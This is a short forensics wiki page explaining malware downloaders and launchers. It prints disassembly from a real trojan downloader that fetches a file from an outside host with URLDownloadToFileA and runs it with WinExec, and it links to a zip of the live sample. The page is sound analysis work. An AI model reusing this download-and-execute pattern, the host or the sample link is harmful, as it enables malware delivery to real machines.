Category:Digital-Forensics/Downloaders

From aldeid
Jump to: navigation, search
You are here:
Downloaders

Downloaders

Description

  • Some malwares download additional resources on the Internet or are just a downloader that download the real malware once installed and activated on the target machine.
  • It makes them smaller in size and more likely to fly inder the radar
  • The protocol used to download the files are commonly HTTP, HTTPS or FTP but other protocols could also be used, even custom ones

Steps

The following assembly code is an extract from TrojanDownloader:Win32/MultiDL.3_0, available for download here: http://vx.org.ua/dl/vir/Trojan-Downloader.Win32.MultiDL.30.b.zip

Step Functions Example
Download file and save to disk
  • URLDownloadToFile()
.text:0040118D                 public start
.text:0040118D start           proc near               ; CODE XREF: .text:004010AC�j
.text:0040118D                 push    0               ; LPBINDSTATUSCALLBACK
.text:0040118F                 push    0               ; DWORD
.text:00401191                 push    offset CmdLine  ; "system32.ini"
.text:00401196                 push    offset aHttpQrojectonl ; "Http://qrojectonline.ath.cx/yourserver."...
.text:0040119B                 push    0               ; LPUNKNOWN
.text:0040119D                 call    URLDownloadToFileA
.text:004011A2                 push    0               ; LPBINDSTATUSCALLBACK
.text:004011A4                 push    0               ; DWORD
.text:004011A6                 push    offset aHttpWwp_icq_co ; "Http://wwp.icq.com/scripts/WWPMsg.dll?f"...
.text:004011AB                 push    offset aHttpWwp_icq_co ; "Http://wwp.icq.com/scripts/WWPMsg.dll?f"...
.text:004011B0                 push    0               ; LPUNKNOWN
.text:004011B2                 call    URLDownloadToFileA
Execute newly downloaded file
  • ShellExecute()
  • WinExec()
  • ...
.text:004011B7                 push    0               ; uCmdShow
.text:004011B9                 push    offset CmdLine  ; "system32.ini"
.text:004011BE                 call    WinExec
.text:004011C3                 push    0
.text:004011C5                 call    $+5
.text:004011CA                 jmp     ExitProcess
.text:004011CA start           endp

Launchers / Loaders

Description

A launcher or a loader is a program that installs malware for immediate or future covert execution. Launchers often contain the malware that they are designed to load.

Comments

blog comments powered by Disqus

Pages in this category

Pages in category "Digital-Forensics/Downloaders"

The following 2 pages are in this category, out of 2 total.